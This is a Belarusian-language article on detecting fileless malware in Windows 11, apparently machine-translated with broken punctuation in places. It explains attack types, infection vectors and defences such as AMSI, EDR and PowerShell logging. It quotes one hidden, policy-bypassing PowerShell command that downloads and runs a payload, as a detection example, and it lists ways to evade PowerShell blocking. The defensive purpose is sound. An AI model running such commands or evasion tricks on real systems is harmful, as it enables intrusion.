Як выявіць небяспечнае бязфайлавае шкоднаснае праграмнае забеспячэнне ў Windows 11

¿Як выявіць небяспечнае шкоднаснае праграмнае забеспячэнне без файлаў? Актыўнасць атак без файлаў значна ўзрасла, і, што яшчэ горш, Windows 11 не мае імунітэтуГэты падыход абыходзіць дыск і абапіраецца на памяць і легітымныя сістэмныя інструменты; вось чаму антывірусныя праграмы на аснове сігнатур маюць праблемы. Калі вы шукаеце надзейны спосаб выяўлення, адказ заключаецца ў спалучэнні тэлеметрыя, аналіз паводзін і элементы кіравання Windows.

У цяперашняй экасістэме кампаніі, якія злоўжываюць PowerShell, WMI або Mshta, суіснуюць з больш складанымі метадамі, такімі як ін'екцыі памяці, захаванне "без дакранання" да дыска і нават злоўжыванні прашыўкайГалоўнае — разумець карту пагроз, фазы атакі і тое, якія сігналы яны пакідаюць, нават калі ўсё адбываецца ў аператыўнай памяці.

Што такое бесфайлавае шкоднаснае праграмнае забеспячэнне і чаму яно выклікае заклапочанасць у Windows 11?

Калі мы гаворым пра «бязфайлавыя» пагрозы, мы маем на ўвазе шкоднасны код, які Вам не трэба захоўваць новыя выканальныя файлы у файлавай сістэме для працы. Звычайна ён уводзіцца ў запушчаныя працэсы і выконваецца ў аператыўнай памяці, абапіраючыся на інтэрпрэтатары і двайковыя файлы, падпісаныя Microsoft (напрыклад, PowerShell, WMI, rundll32, mshtaГэта памяншае ваш след і дазваляе абыходзіць пошукавыя сістэмы, якія шукаюць толькі падазроныя файлы.

Нават офісныя дакументы або PDF-файлы, якія выкарыстоўваюць уразлівасці для запуску каманд, лічацца часткай гэтай з'явы, таму што актываваць выкананне ў памяці не пакідаючы карысных бінарных файлаў для аналізу. Злоўжыванне макрасы і DDE У Office, бо код выконваецца ў легітымных працэсах, такіх як WinWord.

Зламыснікі спалучаюць сацыяльную інжынерыю (фішынг, спам-спасылкі) з тэхнічнымі пасткамі: клік карыстальніка запускае ланцужок, у якім скрыпт загружае і выконвае канчатковую карысную нагрузку ў памяці, пазбягаючы пакідання слядоў на дыску. Мэты вар'іруюцца ад крадзяжу дадзеных да выканання праграм-вымагальнікаў і бясшумнага перамяшчэння.

Тыпалогіі паводле ўплыву на сістэму: ад «чыстых» да гібрыдных

Каб пазбегнуць блытаніны ў паняццях, карысна падзяляць пагрозы па ступені іх узаемадзеяння з файлавай сістэмай. Такая класіфікацыя ўдакладняе што захоўваецца, дзе знаходзіцца код і якія сляды ён пакідае?.

Тып I: няма актыўнасці файлаў

Шкоднаснае праграмнае забеспячэнне без файлаў нічога не запісвае на дыск. Класічным прыкладам з'яўляецца выкарыстанне уразлівасць сеткі (як вектар EternalBlue у мінулыя часы) для рэалізацыі бэкдора, які знаходзіцца ў памяці ядра (выпадкі, падобныя да DoublePulsar). Тут усё адбываецца ў аператыўнай памяці, і ў файлавай сістэме няма артэфактаў.

Іншы варыянт — забрудзіць прашыўкі кампанентаў: BIOS/UEFI, сеткавых адаптараў, перыферыйных прылад USB (метады тыпу BadUSB) або нават падсістэм працэсара. Яны захоўваюцца нават пасля перазагрузкі і пераўсталёўкі, што стварае дадатковыя цяжкасці. Мала якія прадукты правяраюць прашыўкуГэта складаныя атакі, радзейшыя, але небяспечныя з-за сваёй скрытнасці і трываласці.

Тып II: Ускоснае архіваванне

Тут шкоднаснае праграмнае забеспячэнне не «пакідае» свой уласны выканальны файл, а выкарыстоўвае кантэйнеры, якія кіруюцца сістэмай і захоўваюцца ў выглядзе файлаў. Напрыклад, бэкдоры, якія ўсталёўваюць каманды powershell у рэпазітарыі WMI і запускаць яго выкананне з дапамогай фільтраў падзей. Можна ўсталяваць яго з каманднага радка без выдалення двайковых файлаў, але рэпазітар WMI знаходзіцца на дыску як легітымная база дадзеных, што ўскладняе яго ачыстку без уплыву на сістэму.

З практычнага пункту гледжання яны лічацца бязфайлавымі, таму што гэты кантэйнер (WMI, рэестр і г.д.) Гэта не класічны выяўляльны выканальны файл І яго ачыстка — справа няпростая. Вынік: незаўважная захавальнасць з мінімальнай колькасцю «традыцыйных» слядоў.

Тып III: для функцыянавання патрэбныя файлы

У некаторых выпадках захоўваецца захаванне без файлаў На лагічным узроўні ім патрэбны трыгер на аснове файла. Тыповым прыкладам з'яўляецца Kovter: ён рэгіструе каманду абалонкі для выпадковага пашырэння; пры адкрыцці файла з гэтым пашырэннем запускаецца невялікі скрыпт з выкарыстаннем mshta.exe, які аднаўляе шкоднасны радок з рэестра.

Хітрасць у тым, што гэтыя файлы-"прынады" з выпадковымі пашырэннямі не ўтрымліваюць аналізаванай карыснай нагрузкі, і асноўная частка кода знаходзіцца ў рэгістрацыя (іншы кантэйнер). Вось чаму яны класіфікуюцца як бязфайлавыя па ўздзеянні, хоць, строга кажучы, яны залежаць ад аднаго або некалькіх артэфактаў дыска ў якасці трыгера.

Пераносчыкі і «носьбіты» інфекцыі: куды яна пранікае і дзе хаваецца

Для паляпшэння выяўлення вельмі важна вызначыць кропку ўваходу і носьбіта інфекцыі. Гэта дапамагае распрацаваць канкрэтныя элементы кіравання Аддайце прыярытэт адпаведнай тэлеметрыі.

подзвігі

• На аснове файлаў (Тып III): Дакументы, выканальныя файлы, старыя файлы Flash/Java або файлы LNK могуць выкарыстоўваць браўзер або рухавік, які іх апрацоўвае, для загрузкі шэл-кода ў памяць. Першы вектар — гэта файл, але карысная нагрузка перамяшчаецца ў аператыўную памяць.
• Сеткавыя (Тып I): Пакет, які выкарыстоўвае ўразлівасць (напрыклад, у SMB), выконваецца ў карыстальніцкім асяроддзі або ядры. WannaCry папулярызаваў гэты падыход. Прамая загрузка памяці без новага файла.

апаратныя сродкі

• прыборы (Тып I): Прашыўку дыска або сеткавай карты можна змяніць, а таксама ўвесці код. Цяжка праверыць і захоўваецца па-за аперацыйнай сістэмай.
• Працэсар і падсістэмы кіравання (Тып I): Такія тэхналогіі, як ME/AMT ад Intel, прадэманстравалі шляхі да Сетка і выкананне па-за аперацыйнай сістэмайЁн атакуе на вельмі нізкім узроўні, з высокім патэнцыялам скрытнасці.
• USB (Тып I): BadUSB дазваляе перапраграмаваць USB-назапашвальнік, каб ён імітаваў клавіятуру або сеткавую карту і запускаў каманды або перанакіроўваў трафік.
• BIOS / UEFI (Тып I): шкоднаснае перапраграмаванне прашыўкі (выпадкі, падобныя да Mebromi), якое запускаецца перад запускам Windows.
• Гіпервізар (Тып I): Рэалізацыя міні-гіпервізара пад аперацыйнай сістэмай для маскіроўкі яго прысутнасці. Рэдка, але ўжо назіраецца ў выглядзе руткітаў гіпервізара.

Выкананне і ўвядзенне

• На аснове файлаў (Тып III): EXE/DLL/LNK або запланаваныя задачы, якія запускаюць ін'екцыі ў легітымныя працэсы.
• Макрас (Тып III): VBA ў Office можа дэкадаваць і выконваць карысныя нагрузкі, у тым ліку поўнае праграмнае забеспячэнне-вымагальнік, са згоды карыстальніка шляхам падману.
• Scripts (Тып II): PowerShell, VBScript або JScript з файла, камандны радок, паслугі, рэгістрацыя або WMIЗламыснік можа ўвесці скрыпт у аддаленым сеансе, не дакранаючыся да дыска.
• Загрузачны запіс (MBR/Boot) (Тып II): Сямействы, падобныя да Petya, перазапісваюць загрузачны сектар, каб атрымаць кантроль пры запуску сістэмы. Ён знаходзіцца па-за файлавай сістэмай, але даступны для аперацыйнай сістэмы і сучасных рашэнняў, якія могуць яго аднавіць.

Як працуюць атакі без файлаў: фазы і сігналы

Нягледзячы на ​​тое, што яны не пакідаюць выканальных файлаў, кампаніі прытрымліваюцца паэтапнай логікі. Іх разуменне дазваляе ажыццяўляць маніторынг. падзеі і сувязі паміж працэсамі якія пакідаюць след.

• Першапачатковы доступФішынгавыя атакі з выкарыстаннем спасылак або ўкладанняў, узламаных вэб-сайтаў або выкрадзеных уліковых дадзеных. Многія ланцужкі пачынаюцца з дакумента Office, які запускае каманду PowerShell.
• Настойлівасць: бэкдоры праз WMI (фільтры і падпіскі), Ключы выканання рэестра або запланаваныя задачы, якія перазапускаюць скрыпты без новага шкоднаснага файла.
• ЭкфільтрацыяПасля збору інфармацыі яна адпраўляецца з сеткі з выкарыстаннем надзейных працэсаў (браўзераў, PowerShell, bitsadmin) для змешвання трафіку.

Гэтая заканамернасць асабліва падступная, таму што паказчыкі нападу Яны хаваюцца ў звычайным: аргументы каманднага радка, ланцужкі працэсаў, анамальныя выходныя злучэнні або доступ да API-інтэрфейсаў ін'екцый.

Распаўсюджаныя метады: ад памяці да запісу

Акцёры абапіраюцца на цэлы шэраг метады якія аптымізуюць схаванасць. Карысна ведаць найбольш распаўсюджаныя з іх, каб актываваць эфектыўнае выяўленне.

• Жыхар у памяціЗагрузка карысных нагрузак у прастору даверанага працэсу, які чакае актывацыі. руткіты і перахопнікі У ядры яны павышаюць узровень схаванасці.
• Захаванне ў рэестрыЗахоўвайце зашыфраваныя блобы ў ключах і рэгідруйце іх з легітымнай праграмы запуску (mshta, rundll32, wscript). Часовы ўсталёўшчык можа самазнішчыцца, каб мінімізаваць свой след.
• Фішынг уліковых дадзеныхВыкарыстоўваючы скрадзеныя імёны карыстальнікаў і паролі, зламыснік выконвае выдаленыя абалонкі і ўстаноўкі. ціхі доступ у рэестры або WMI.
• «Бефайлавае» праграмнае забеспячэнне-вымагальнікШыфраванне і сувязь C2 арганізуюцца з аператыўнай памяці, што змяншае магчымасці выяўлення, пакуль пашкоджанне не стане бачным.
• Аперацыйныя камплектыаўтаматызаваныя ланцужкі, якія выяўляюць уразлівасці і разгортваюць карысныя нагрузкі толькі ў памяці пасля таго, як карыстальнік націсне на кнопку.
• Дакументы з кодаммакрасы і механізмы, такія як DDE, якія запускаюць каманды без захавання выканальных файлаў на дыск.

Даследаванні галіны ўжо паказалі прыкметныя пікі: у адзін з перыядаў 2018 года павелічэнне больш чым на 90% пры атаках на аснове скрыптоў і ланцужкоў PowerShell, што сведчыць аб тым, што вектар пераважнейшы з-за сваёй эфектыўнасці.

Задача для кампаній і пастаўшчыкоў: чаму блакавання недастаткова

Было б спакусліва адключыць PowerShell або забараніць макрасы назаўжды, але Вы б парушылі аперацыюPowerShell — гэта слуп сучаснага адміністравання, а Office — неабходны ў бізнэсе; сляпая блакіроўка часта немагчымыя.

Акрамя таго, ёсць спосабы абыйсці асноўныя элементы кіравання: запуск PowerShell праз DLL і rundll32, упакоўка скрыптоў у EXE-файлы, Прынясіце сваю ўласную копію PowerShell ці нават хаваць скрыпты ў выявах і здабываць іх у памяць. Такім чынам, абарона не можа грунтавацца выключна на адмаўленні існавання інструментаў.

Яшчэ адна распаўсюджаная памылка — дэлегаванне ўсяго рашэння воблаку: калі агент павінен чакаць адказу ад сервера, Вы губляеце прафілактыку ў рэжыме рэальнага часуТэлеметрычныя дадзеныя можна загружаць для ўзбагачэння інфармацыі, але Змякчэнне павінна адбывацца ў канчатковай кропцы.

Як выявіць шкоднасныя праграмы без файлаў у Windows 11: тэлеметрыя і паводзіны

Выйгрышная стратэгія — гэта кантраляваць працэсы і памяцьНе файлы. Шкоднасныя паводзіны больш стабільныя, чым формы файлаў, што робіць іх ідэальнымі для механізмаў прафілактыкі.

• AMSI (інтэрфейс сканавання антывірусных праграм)Ён перахоплівае скрыпты PowerShell, VBScript або JScript, нават калі яны дынамічна ствараюцца ў памяці. Выдатна падыходзіць для захопу абфускаваных радкоў перад выкананнем.
• Маніторынг працэсаўстарт/фініш, PID, бацькі і дзеці, маршруты, камандныя радкі і хэшы, а таксама дрэвы выканання, каб зразумець усю гісторыю.
• Аналіз памяцівыяўленне ін'екцый, адлюстраванняў або PE-нагрузак без дакранання да дыска і прагляд незвычайных выканальных абласцей.
• Абарона стартаракантроль і аднаўленне MBR/EFI ў выпадку ўмяшання.

У экасістэме Microsoft Defender for Endpoint спалучае AMSI, маніторынг паводзінДля маштабавання выяўлення новых або заблытаных варыянтаў выкарыстоўваюцца сканаванне памяці і машыннае навучанне на аснове воблака. Іншыя пастаўшчыкі выкарыстоўваюць падобныя падыходы з рэзідэнтнымі рухавікамі ядра.

Рэалістычны прыклад карэляцыі: ад дакумента да PowerShell

Уявіце сабе ланцужок, дзе Outlook спампоўвае ўкладанне, Word адкрывае дакумент, уключаецца актыўны кантэнт, а PowerShell запускаецца з падазронымі параметрамі. Адпаведная тэлеметрыя пакажа... Камандны радок (напрыклад, абыход ExecutionPolicy, схаванае акно), падключэнне да ненадзейнага дамена і стварэнне даччынага працэсу, які ўсталёўваецца ў AppData.

Агент з лакальным кантэкстам здольны спыніцца і рухацца назад шкоднасную дзейнасць без ручнога ўмяшання, акрамя апавяшчэння SIEM або па электроннай пошце/SMS. Некаторыя прадукты дадаюць узровень атрыбуцыі першапрычыны (мадэлі тыпу StoryLine), які паказвае не на бачны працэс (Outlook/Word), а на поўная шкоднасная тэма і яго паходжанне для комплекснай ачысткі сістэмы.

Тыповы шаблон каманды, на які варта звярнуць увагу, можа выглядаць наступным чынам: powershell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden (New-Object Net.WebClient).DownloadString('http//dominiotld/payload');Логіка — гэта не дакладны радок, але набор сігналаўабыход палітыкі, схаванае акно, ачыстка загрузкі і выкананне ў памяці.

AMSI, канвеер і роля кожнага ўдзельніка: ад канчатковай кропкі да SOC

Акрамя захопу сцэнарыяў, надзейная архітэктура арганізуе крокі, якія спрашчаюць расследаванне і рэагаванне. Чым больш доказаў перад выкананнем нагрузкі, тым лепш., лепшае.

• Перахоп скрыптаAMSI дастаўляе кантэнт (нават калі ён генеруецца на хаду) для статычнага і дынамічнага аналізу ў канвееры шкоднасных праграм.
• Падзеі працэсуЗбіраюцца PID, бінарныя файлы, хэшы, маршруты і іншыя дадзеныя. аргументы, усталёўваючы дрэвы працэсаў, якія прывялі да канчатковай загрузкі.
• Выяўленне і справаздачнасцьВыяўленні адлюстроўваюцца на кансолі прадукту і перасылаюцца на сеткавыя платформы (NDR) для візуалізацыі кампаніі.
• Гарантыі карыстальнікаНават калі скрыпт устаўляецца ў памяць, фрэймворк AMSI перахоплівае яго у сумяшчальных версіях Windows.
• Магчымасці адміністратара: канфігурацыя палітыкі для ўключэння праверкі скрыптоў, блакіроўка на аснове паводзін і стварэнне справаздач з кансолі.
• Праца SOC: выманне артэфактаў (VM UUID, версія АС, тып скрыпта, працэс-ініцыятар і яго бацькоўскі працэс, хэшы і камандныя радкі) для аднаўлення гісторыі і правілы ліфтаў будучыя.

Калі платформа дазваляе экспартаваць буфер памяці У сувязі з выкананнем даследчыкі могуць генераваць новыя выяўленні і ўзбагачаць абарону ад падобных варыянтаў.

Практычныя меры ў Windows 11: прафілактыка і паляванне

Акрамя EDR з праверкай памяці і AMSI, Windows 11 дазваляе закрываць прасторы для атак і паляпшаць бачнасць з дапамогай убудаваныя элементы кіравання.

• Рэгістрацыя і абмежаванні ў PowerShellУключае рэгістрацыю блокаў скрыптоў і рэгістрацыю модуляў, ужывае абмежаваныя рэжымы, дзе гэта магчыма, і кантралюе выкарыстанне Абыход/Схаваны.
• Правілы скарачэння паверхні атакі (ASR): блакуе запуск скрыптоў працэсамі Office і Злоўжыванне WMI/PSExec, калі не патрэбны.
• Палітыкі макрасаў Office: па змаўчанні адключае ўнутранае падпісанне макрасаў і строгія спісы даверу; кантралюе састарэлыя патокі DDE.
• Аўдыт WMI і рэестр: кантралюе падпіскі на падзеі і ключы аўтаматычнага выканання (Run, RunOnce, Winlogon), а таксама стварэнне задач па раскладзе.
• Абарона ад запуску: актывуе бяспечную загрузку, правярае цэласнасць MBR/EFI і пацвярджае адсутнасць змяненняў пры запуску.
• Латанне і ўмацаванне: закрывае ўразлівасці, якія можна выкарыстоўваць, у браўзерах, кампанентах Office і сеткавых службах.
• Усведамленненавучае карыстальнікаў і тэхнічныя каманды фішынгу і сігналам таемныя пакаранні смерцю.

Для пошуку сканцэнтруйцеся на пытаннях аб: стварэнні працэсаў Office для PowerShell/MSHTA, аргументах з радок загрузкі/файл загрузкіСкрыпты з празрыстай абфускацыяй, рэфлексіўнымі ін'екцыямі і выходнымі сеткамі ў падазроныя дамены верхняга ўзроўню. Спасылайцеся на гэтыя сігналы з рэпутацыяй і частатой, каб паменшыць шум.

Што можа выявіць кожны рухавік сёння?

Карпаратыўныя рашэнні Microsoft спалучаюць AMSI, паводніцкую аналітыку, праверыць памяць і абарона загрузачнага сектара, а таксама воблачныя мадэлі машыннага навучання для маштабавання супраць новых пагроз. Іншыя пастаўшчыкі ўкараняюць маніторынг на ўзроўні ядра, каб адрозніваць шкоднаснае праграмнае забеспячэнне ад бяспечнага з аўтаматычным адкатам змяненняў.

Падыход, заснаваны на гісторыі пакарання смерцю Гэта дазваляе вызначыць першапрычыну (напрыклад, укладанне Outlook, якое запускае ланцужок) і паменшыць колькасць праблем ва ўсім дрэве: скрыпты, ключы, задачы і прамежкавыя двайковыя файлы, пазбягаючы засяроджвання на бачным сімптоме.

Тыповыя памылкі і як іх пазбегнуць

Блакіроўка PowerShell без альтэрнатыўнага плана кіравання не толькі непрактычная, але і... спосабы яго ўскоснага выклікуТое ж самае тычыцца і макрасаў: альбо вы кіруеце імі з дапамогай палітык і подпісаў, альбо бізнес пацерпіць. Лепш засяродзіцца на тэлеметрыі і правілах паводзін.

Яшчэ адна распаўсюджаная памылка — меркаванне, што даданне праграм у белы спіс вырашае ўсё: тэхналогія без файлаў абапіраецца менавіта на гэта. давераныя праграмыКантроль павінен назіраць за тым, што яны робяць і як яны звязаны, а не толькі за тым, ці ім дазволена.

З улікам усяго вышэйпералічанага, безфайлавае шкоднаснае праграмнае забеспячэнне перастае быць "прывідам", калі вы адсочваеце тое, што сапраўды важна: паводзіны, памяць і паходжанне кожнага выканання. Спалучэнне AMSI, пашыранай тэлеметрыі працэсаў, убудаваных элементаў кіравання Windows 11 і ўзроўню EDR з аналізам паводзін дае вам перавагу. Дадайце да гэтага рэалістычныя палітыкі для макрасаў і PowerShell, аўдыт WMI/рэестра і паляванне, якое прыярытызуе камандныя радкі і дрэвы працэсаў, і вы атрымаеце абарону, якая разрывае гэтыя ланцужкі, перш чым яны выдадуць гук.